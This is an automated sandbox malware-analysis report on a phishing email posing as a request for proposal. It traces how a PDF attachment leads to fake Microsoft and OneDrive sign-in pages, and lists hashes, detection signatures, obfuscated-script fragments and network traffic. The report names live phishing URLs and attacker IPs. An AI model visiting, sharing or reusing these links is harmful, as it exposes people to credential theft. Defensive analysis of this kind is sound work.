Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
[EXTERNAL] Redbrick Communications Request For Proposal .eml

Overview

General Information

Sample name:[EXTERNAL] Redbrick Communications Request For Proposal .eml
Analysis ID:1538796
MD5:444c20f8162f2d53fd9c0c87e1ce97e5
SHA1:0e375d16441994421c68b95f339ae7b32fb98194
SHA256:aca675ed79973dc7edcedd2558a3affa929b2777afb107195864c7d6370f1552
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected landing page (webpage, office document or email)
AI detected potential phishing Email
HTML page contains obfuscated javascript
Phishing site detected (based on favicon image match)
Phishing site detected (based on image similarity)
Creates a window with clipboard capturing capabilities
Detected clear text password fields (password is not hidden)
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Invalid 'sign-in options' or 'sign-up' link found
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6668 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\[EXTERNAL] Redbrick Communications Request For Proposal .eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6916 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "C893188F-B547-495B-A163-D0C4FA4A6C44" "C6D3235E-0B00-4E43-8169-199264D12382" "6668" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • Acrobat.exe (PID: 7068 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\FE4HG9BK\Redbrick Communications (RFP) ID#19994.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 3284 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 3424 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1748 --field-trial-handle=1604,i,12233105341430411722,14371217641438827000,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • chrome.exe (PID: 7608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rb003.revillajimenezasoc.com//@ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,15778528327472951222,3276190338158914891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rb003.revillajimenezasoc.com//@ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 3960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1932,i,13640797076422111405,4577157427694876214,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\FE4HG9BK\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://p4enterprises.com/yyhu.htmlLLM: Score: 7 Reasons: The brand 'Microsoft OneDrive' is well-known and typically associated with the domain 'onedrive.live.com'., The provided URL 'p4enterprises.com' does not match the legitimate domain for Microsoft OneDrive., The URL 'p4enterprises.com' does not contain any recognizable elements related to Microsoft or OneDrive., The URL appears to be a generic domain name with no clear association to the brand 'Microsoft OneDrive'., The presence of a generic input field labeled 'Enter rfp' does not align with typical Microsoft OneDrive functionality. DOM: 1.0.pages.csv
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64LLM: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'bespoke.global-constructions.ca' does not match the legitimate domain for Microsoft., The domain 'global-constructions.ca' does not have any known association with Microsoft., The presence of a password input field on a non-Microsoft domain is suspicious., The URL structure with 'bespoke' and 'global-constructions' suggests a potential phishing attempt as it does not align with Microsoft's typical domain structure. DOM: 4.11.pages.csv
Source: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49HTTP Parser: function a0_0x2715(){var _0x50fd02=['send','3400551lUpwmh','querySelectorAll','src','textConte
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64HTTP Parser: var a0_0x2ac5b1=a0_0x3f7d;(function(_0x2f86b4,_0xdc976b){var _0x2b9367=a0_0x3f7d,_0x22a028=_0x2
Source: https://bespoke.global-constructions.ca/js2_/67168ea5e8b89-9d7acd36bcda926e6106a0741706a8c1HTTP Parser: const a0_0x51e51a=a0_0x1fd5;function a0_0x1fd5(_0x5ed4ce,_0x323b12){const _0x449c60=a0_0x170e();retu
Source: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49Matcher: Template: microsoft matched with high similarity
Source: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49Matcher: Found strong image similarity, brand: MICROSOFT
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: <input type="text"... for password input
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: Number of links: 0
Source: https://bespoke.global-constructions.ca/HTTP Parser: Number of links: 0
Source: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49HTTP Parser: Number of links: 0
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64HTTP Parser: Number of links: 0
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><!--!Font Awesome Free 6.5.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free Copyright 2024 Fonticons, Inc.--><path d="M38.8 5.1C28.4-3.1 13.3-1.2 5.1 9...
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: Title: PDF Document does not match URL
Source: https://bespoke.global-constructions.ca/HTTP Parser: Title: Sign in to your account does not match URL
Source: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49HTTP Parser: Title: Sign in to your account does not match URL
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64HTTP Parser: Title: Sign in to your account does not match URL
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64HTTP Parser: Invalid link: reset it now.
Source: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49HTTP Parser: Invalid link: get a new Microsoft account
Source: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49HTTP Parser: Invalid link: Terms of use
Source: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49HTTP Parser: Invalid link: Privacy & cookies
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64HTTP Parser: Invalid link: Terms of use
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64HTTP Parser: Invalid link: Privacy & cookies
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: <input type="password" .../> found
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64HTTP Parser: <input type="password" .../> found
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: No favicon
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: No favicon
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: No favicon
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64HTTP Parser: No favicon
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: No <meta name="author".. found
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: No <meta name="author".. found
Source: https://bespoke.global-constructions.ca/HTTP Parser: No <meta name="author".. found
Source: https://bespoke.global-constructions.ca/HTTP Parser: No <meta name="author".. found
Source: https://bespoke.global-constructions.ca/HTTP Parser: No <meta name="author".. found
Source: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49HTTP Parser: No <meta name="author".. found
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64HTTP Parser: No <meta name="author".. found
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: No <meta name="copyright".. found
Source: https://p4enterprises.com/yyhu.htmlHTTP Parser: No <meta name="copyright".. found
Source: https://bespoke.global-constructions.ca/HTTP Parser: No <meta name="copyright".. found
Source: https://bespoke.global-constructions.ca/HTTP Parser: No <meta name="copyright".. found
Source: https://bespoke.global-constructions.ca/HTTP Parser: No <meta name="copyright".. found
Source: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49HTTP Parser: No <meta name="copyright".. found
Source: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.131:443 -> 192.168.2.16:49825 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 144.217.158.133
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: p4enterprises.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: bespoke.global-constructions.ca
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
